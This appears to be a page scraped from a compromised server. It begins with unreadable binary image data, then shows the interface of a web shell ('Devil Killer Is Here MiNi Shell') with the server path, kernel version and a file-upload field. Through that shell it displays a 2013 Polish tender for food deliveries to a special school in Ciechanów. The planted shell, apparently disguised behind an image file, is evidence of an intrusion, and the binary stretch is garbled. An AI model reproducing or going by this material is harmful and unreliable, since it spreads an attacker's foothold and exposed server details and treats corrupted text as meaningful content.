JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130313/38121-N-2013.html

<p class="kh_header"><b>Ciechanów: Dostawa artykułów żywnościowych na potrzeby Specjalnego Ośrodka Szkolno- Wychowawczego  w Ciechanowie</b><br>
<b>Numer ogłoszenia: 38121 - 2013; data zamieszczenia: 13.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy , ul. Sienkiewicza 13, 06-400 Ciechanów, woj. mazowieckie, tel. 23 6722889, faks 23 6722889.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych na potrzeby Specjalnego Ośrodka Szkolno- Wychowawczego  w Ciechanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych na potrzeby Specjalnego Ośrodka Szkolno-Wychowawczego w Ciechanowie.
Dostawę art. żywnościowych Zamawiający podzielił na siedem części. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną, kilka lub wszystkie części.  Oferta musi obejmować wszystkie pozycje określone w danej części. 

Część I - Artykuły spożywcze sypkie, koncentraty, przyprawy i desery
Lp.	Nazwa artykułu i wielkość opakowania jednostkowego	Jednostka miary	Ilość
1		Baton Grzesiek 50 g	szt	49
2		Budyń Słodka chwila 43g	szt	31
3		Chrzan 160g	szt	7
4		Ciastka Petitki 50g	szt	115
5		Ciasto francuskie 275g	szt 	8
6		Cukier 1kg	kg	299
7		Cukier puder 0,5 kg	kg	4
8		Dżem truskawkowy n/s 300g	szt	142
9		Dżem truskawkowy n/s 450g	szt	60
10		Dżem wisnia n/s 300g	szt	143
11		Groszek konserwowy 400g	szt	68
12		Herbata 100g	szt	58
13		Kakao 100g	szt	7
14		Kakao Puchatek 500g	szt	2
15		Kasza gryczana 0,5kg	kg	29,5
16		Kasza jęczmienna 400g	kg	58
17		Kawa Inka 150g	szt	1
18		Ketchup Miwex 500g	szt	183
19		Kisiel cytrynowy 58g	szt	75
20		Kisiel Słodka chwila 30g	szt	84
21		Kisiel Słodka chwila 40g	szt	100
22		Kompot (różne smaki) 920g	szt	48
23		Koncentrat pomidorowy 190g	szt	12
24		Koncentrat pomidorowy 950g	szt	69
25		Kukurydza konserwowa 360g	szt	12
26		Kwasek cytrynowy 20g	szt	36
27		Liść laurowy 0,1 kg	kg	0,7
28		Majeranek 0,2 kg	kg	1
29		Majonez kętrzyński 460g	szt	10
30		Majonez kętrzyński 815g	szt	60
31		Makaron falbanki 750g	szt	5
32		Makaron krajanka 400g	szt	23
33		Makaron nitka 250g	szt	88
34		Makaron nitka 400g	szt	109
35		Makaron rurki 500g	szt	103
36		Makaron spaghetti 0,5	kg	57,5
37		Makaron świderek 1 kg	kg	63
38		Makaron świderek 400g	szt	60
39		Makaron świderek 500g	kg	13,5
40		Marina przyprawa do kurczaka 1kg	kg	5
41		Masło roślinne 250g/500g	kg	110
42		Maka pszenna 1kg	kg	122
43		Mąka ziemniaczana 1kg	kg	4
44		Miód jednorazowy 25g	szt	106
45		Musztarda 200g	szt	64
46		Ocet 0,5 L	szt	32
47		Ogórek konserwowy 0,9 L	szt	34
48		Olej 1 L	szt	202
49		Pasztet podlaski 195g	szt	287
50		Pieprz mielony 0,5kg	kg	5
51		Płatki Corn flakes 250g	szt	70
52		Płatki Corn flakes 500g	szt	47
53		Powidła śliwkowe 280g	szt	12
54		Przyprawa Kucharek 1kg	szt	69
55		Przyprawa Kucharek 200g	szt	33
56		Przyprawa Kucharek 500g	szt	51
57		Przyprawa Vegeta 200g	szt	20
58		Płatki - Przysmak śniadaniowy 250g (różne smaki)	szt	96
59		Ryż 1kg	kg	90
60		Sałatka szwedzka 900g	szt	5
61		Serek topiony 100g	kg	1
62		Sól 1kg	kg	83
63		Sos słodko-kwaśny 520g	szt	112
64		Syrop mix-paloma 500g	szt	29
65		Syrop owocowy mix 430g	szt	282
66		Szczaw konserwowy	szt	81
67		Ziele angielskie 0,2kg	kg	0,2

 Artykuły spożywcze mają być dostarczane do Zamawiającego w opakowaniach zbiorczych - zgrzewkach, kartonach itp.,  oznaczonych numerem tej samej partii towaru. Wszystkie artykuły muszą być świeże, z początkowego terminu przydatności do spożycia . Artykuły sypkie muszą być bez zanieczyszczeń.
Makarony muszą odpowiadać jakością najlepszych makaronów na rynku i nie mogą rozpadać się podczas gotowania.
Opakowania wszystkich w/w artykułów nie mogą być uszkodzone ( porwane , dziurawe itp.)

Część II - Świeże mięso, wędliny i drób 
Drób - mięso świeże 

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1		Filet z kurczaka	kg	135
2		Ćwiartka tylna z kurczaka	kg	286
3		Kurczaki 	kg	13
4		Korpus z kurczaka	kg	310

Drób - wędliny świeże 

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1		Szynka z piersi kurczaka	kg	13

Mięso świeże wieprzowe, wołowe

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1		Boczek surowy	kg	2
2		Karkówka bez kości	kg	57
3		Kości wieprzowe 	kg	74
4		Łopatka bez kości 	kg	318
5		Schab bez kości 	kg	96
6		Szynka bez kości surowa	kg	35
7		Udziec wołowy bez kości 	kg	51
8		Żeberka wieprzowe	kg	110
9		Podgardle 	kg	2
10		Szponder wołowy	kg	2
11		Słonina 	kg	41

Wędliny świeże

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1		Berlinki 	kg	10
2		Boczek wedzony	kg	30
3		Kiełbasa zwyczajna	kg	76
4		Kaszanka gryczana	kg	59
5		Kiełbasa ogniskowa	kg	13
6		Kiełbasa krakowska parzona	kg	24
7		Kiełbasa szynkowa	kg	41
8		Tyrolska 	kg	79
9		Parówkowa 	kg	84
10		Mortadela 	kg	50
11		Ogonówka parzona 	kg	45
12		Parówki hoddogowe 	kg	45
13		Pieczeń wiedeńska 	 kg	39
14		Pasztetowa 	kg	24
15		Kiełbasa biała chłopska	kg	17
16		Kiełbasa śląska	kg	15
17		Pasztet domowy 	kg	19
18		Kiełbasa wekendowa	kg	12

Mięso, drób i wędliny muszą być świeże, bez nalotu i zapachu starego mięsa z początkowym 
terminem przydatności do spożycia, a waga jego po zważeniu u Zamawiającego musi odpowiadać 
wadze na fakturze. Zamawiający nie uwzględnia ubytku który powstanie podczas transportu w 
postaci wody.
Mięso winno być  ze świeżego rozbioru, bez konserwantów, w stanie pozwalającym na zamrożenie.
Wędliny muszą być świeże, wysokiej jakości pod względem właściwości organoleptycznych - świeży wygląd, smak, zapach - jak i odżywczych,  w początkowym terminie przydatności do spożycia przewidzianego dla danej wędliny.
Na mięso, drób i wędliny przy każdej dostawie ma być dostarczony Handlowy Dokument 
Identyfikacyjny (HDI

Część  III - Jaja kurze świeże o gramaturze 53 g - 63 g

Lp.	Nazawa artykułu	Jednostka miary	Ilość
1		Jaja kurze Jaja kurze (wielkość jaja M, sposób chowu 3)	szt	4700

Do Zamawiającego mogą być dostarczone jaja kurze o lepszych parametrach, jednak w cenie nie 
wyższej jak ustalona dla wielkości jaja M i sposobu chowu 3. Jaja muszą być czyste, oznakowane 
kodem producenta zawierającym sposób chowu kur, kod kraju producenta i weterynaryjny numer identyfikacyjny. Na opakowaniu musi być umieszczony aktualny termin przydatności do spożycia. 
Do Zamawiającego muszą być dostarczane  w początkowym terminie przydatności do spożycia. 
Na jaja przy każdej dostawie ma być dostarczony Handlowy Dokument Identyfikacyjny (HDI).

Część IV - Mleko i produkty mleczarskie

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1		Mleko spożywcze 2 %	litry	570
2		Jogurt 150g	szt	452
3		Jogurt 135g	szt	10
4		Serek hochland krążek mix 200g	op	33
5		Ser twardy salami	kg	53
6		Śmietana 30 %	litry	140
7		śmietana 18 %	litry	13
8		Twaróg półt3usty	kg	50
9		Twaróg homogenizowany 150g	szt	500
10		Masło śmietankowe 200g	kg	104
11		Ser twardy edamski	kg	19
12		Serek wiejski 150g	szt	70

Mleko i produkty mleczarskie muszą być w oryginalnych opakowaniach jednostkowych producenta, dostarczone do Zamawiającego w opakowaniach zbiorczych - zgrzewkach, kartonach itp., 
oznaczonych numerem tej samej partii towaru.  Produkty mleczarskie muszą być świeże, smaczne 
i pachnące i posiadać aktualny  termin przydatności do spożycia przewidziany dla danego produktu.
 Do Zamawiającego muszą być dostarczane  w początkowym terminie przydatności do spożycia.
 Przy każdej dostawie ma być dostarczony Handlowy Dokument Identyfikacyjny (HDI).


CZĘŚĆ V - Pieczywo i wyroby piekarnicze

Lp.	Nazwa artykułu	Jednostka miary	Ilość 
1		Chleb zwykły krojony 0,5kg	szt	1770
2		Chleb razowy krojony 0,5kg	szt	240
3		Bułka zwykła 0,1kg	szt	6400
4		Bułka tarta 0,5kg	kg	68
5		Placek drożdżowy	szt	10
6		Pączki 	szt	300
7		Bułka drożdżowa	szt 	100
8		Bułka słodka	szt	100
9		Babka piaskowa	szt	16
10		Rogal czekoladowy	szt	36

Pieczywo i  wyroby piekarnicze  - świeże dostarczane bezpośrednio po wytworzeniu.
Pieczywo i  wyroby piekarnicze ( w tym ciasto) mają być nie przypalone i nie popękane. Chleb nie 
może być gliniasty i nie może się kruszyć.

CZĘŚĆ VI - Mrożone artykuły spożowcze

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1		Pierogi z truskawką 1 kg	kg	44
2		Pierogi z truskawką  450g	szt	31
3		Frytki 2,5 kg	szt	75
4		Mieszanka warzywna 450g	kg	36
5		Pierogi z mięsem 450g	kg	39,6
6		Pierogi z serem 450g	kg	45,9
7		Pizza z szynką 1kg	szt	9
8		Pyzy z mięsem 450g	szt	85

Mrożonki muszą być nie przeterminowane z aktualnym terminem przydatności do spożycia.  Do Zamawiającego muszą być dostarczane w początkowym terminie przydatności do spożycia, w opakowaniach zbiorczych - zgrzewkach, kartonach itp., oznaczonych numerem tej samej partii 
towaru. 

Część VII -  Ryby i przetwory rybne

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1	Filet z ryb (mrożony)	kg	80
2	Paprykarz 300g	szt	30
3	Makrela wędzona	kg	20
4	Szprot w oleju 170 g	szt	40
5	Szprot w pomidorach 300 g	szt	10
6	Matjas solony	kg	6
7	Płaty śledziowe marynowane	kg	6
8	Sałatka śledziowa	kg	5

Filety rybne muszą być mrożone z małą zawartością wody (SHP).
Filety mrożone, ryby wędzone, przetwory rybne, puszki rybne  muszą być nie przeterminowane z aktualnym terminem przydatności do spożycia, dostarczone w opakowaniach zbiorczych - zgrzewkach, kartonach itp., oznaczone numerem tej samej partii towaru. 
Do Zamawiającego muszą być dostarczane   w  początkowym terminie przydatności do spożycia.
Przy każdej dostawie ma być dostarczony Handlowy Dokument Identyfikacyjny (HDI).

Wykonawca    zobowiązuje   się : 
- dostarczać   produkty  odpowiadające   wszelkim   normom i standardom dopuszczającym ich do sprzedaży i spożycia.
- Przedmiot zamówienia będzie odpowiedniej jakości handlowej i zdrowotnej, dostarczony  transportem wykonawcy zgodnie z obowiązującymi atestami, Polskimi Normami,   obowiązującymi wymogami prawa żywnościowego, GMP oraz systemu HACCP. 
- Na żądanie Zamawiającego Wykonawca dostarczy Zamawiającemu dokumenty  potwierdzające, że producent w procesie produkcji i obrocie, a sprzedawca w obrocie, w zakresie przedmiotu zamówienia ma wdrożony i stosuje system HACCP. Dokumentami tymi  będzie kserokopia zaświadczenia wydanego przez właściwą terytorialnie stację Inspekcji Sanitarno - Epidemiologiczną o spełnieniu wymogów o bezpieczeństwie żywności i żywienia  lub świadectwo weterynaryjne.

Przedmiot zamówienia będzie dostarczony transportem Wykonawcy, zgodnie z obowiązującymi wymaganiami GMP/GHP oraz systemem HACCP na jego koszt. Osoby wykonujące zamówienia (kierowcy, pomocnicy itp.) muszą posiadać aktualne  zaświadczenia lekarskie: sanitarno - epidemiologiczne, zezwalające na pracę w kontakcie z żywnością. Na każde wezwanie Zamawiającego Wykonawca obowiązany jest do dostarczenia   w/w dokumentów.
Zamawiający wymaga, aby opakowania zabezpieczające jakość dostarczonych towarów nie były brudne, uszkodzone mechanicznie, materiał opakowany był dopuszczony do kontaktu z żywnością.

Towar dostarczony w oryginalnych opakowaniach, powinien mieć na opakowaniu czytelne oznaczenia fabryczne tzn. rodzaj, nazwę wyrobu, ilość, datę produkcji, termin przydatności do spożycia lub termin minimalnej trwałości, nazwę i adres producenta oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego. Przy każdej dostawie ma być dostarczony przez Wykonawcę Handlowy Dokument Identyfikacyjny (HDI).

Odbiór jakościowy i ilościowy dostarczonego towaru odbywać się będzie w magazynie Zamawiającego przy udziale Wykonawcy.

Przyjęcie towaru odbywać się będzie na podstawie faktury lub dowodu dostawy z aktualną ceną zgodnie z umową.
Wykonawca zobowiązuje się do przekazywania towaru bezpośrednio do rąk upoważnionego pracownika. Nie dopuszcza się pozostawienia towaru bez opieki lub przekazywania go osobom nieupoważnionym.

Wykonawca ponosi odpowiedzialność za ilość oraz jakość dostarczonych towarów.

Wykonawca udziela gwarancji na przedmiot zamówienia, który musi posiadać aktualny termin przydatności do spożycia 
W razie stwierdzenia w dostawie produktów nieodpowiedniej jakości lub braków ilościowych, Wykonawca zobowiązuje się bezzwłocznie uzupełnić braki ilościowe - jeżeli takie zostaną stwierdzone przez Zamawiającego   w otrzymanej dostawie w dniu dostawy lub  niezwłocznie wymienić wadliwe produkty na wolne od wad  -  na swój koszt. 

Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy.

Zamawiający zastrzega sobie prawo zamówienia mniejszej ilości towaru niż określona w ofercie. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu zmniejszenia zamówienia.

Dopuszcza się możliwość zmiany ilości poszczególnego asortymentu w każdej z części zamówienia.
Zamawiający określa terminy dostaw w/w art. żywnościowych:

Część I - Artykuły spożywcze sypkie, koncentraty, przyprawy i desery
-  w miarę potrzeb w godzinach 8.00 - 10.00 , dwa razy w tygodniu - w dniach ustalonych przez Zamawiającego z Wykonawcą 
Część II - Świeże mięso, wędliny i drób
- codziennie w godzinach 8.00 - 9.30
Część III - Jaja kurze świeże o gramaturze 53 g - 63 g.
- raz w tygodniu w godz. 8.00 - 10.00, w dniu ustalonym przez Zamawiającego z Wykonawcą
Część IV - Mleko i produkty mleczarskie
- codziennie w godzinach 6.00 - 6.30
Część V - Pieczywo i wyroby piekarnicze
- codziennie w godzinach 6.00 - 6.30
Część VI -- Mrożone artykuły spożowcze
- w miarę potrzeb w godzinach 8.00 - 10.00 , raz w tygodniu - w dniu ustalonym przez Zamawiającego z Wykonawcą.
Część VII - Ryby i przetwory rybne
- w miarę potrzeb w godzinach 8.00 - 10.00 , dwa razy w tygodniu - w dniach ustalonych przez  Zamawiającego z Wykonawcą.

Termin wykonania zamówienia - od daty podpisania umowy na realizację przedmiotu zamówienia do dnia 31 grudnia 2013 r. 
W trakcie obowiązywania umowy - dostawa artykułów żywnościowych sukcesywnie, w miarę potrzeb, zapotrzebowanie zgłoszone pisemnie, telefonicznie, faksowo - na dzień wcześniej przed terminem realizacji zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3, 15.61.00.00-7, 15.85.10.00-8, 15.30.00.00-1, 15.87.00.00-7, 15.86.00.00-4, 15.11.00.00-2, 15.10.00.00-9, 15.11.21.00-7, 15.13.11.30-5, 15.11.13.00-3, 15.11.10.00-9, 15.13.11.35-0, 15.13.13.19-1, 03.14.25.00-3, 15.50.00.00-3, 15.51.00.00-6, 15.54.21.00-2, 15.55.13.00-8, 15.54.00.00-5, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust.1 upzp. Zamawiający dokona oceny spełnienia tego warunku metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust.1 upzp. Zamawiający dokona oceny spełnienia tego warunku metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust.1 upzp. Zamawiający dokona oceny spełnienia tego warunku metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust.1 upzp. Zamawiający dokona oceny spełnienia tego warunku metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust.1 upzp. Zamawiający dokona oceny spełnienia tego warunku metodą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
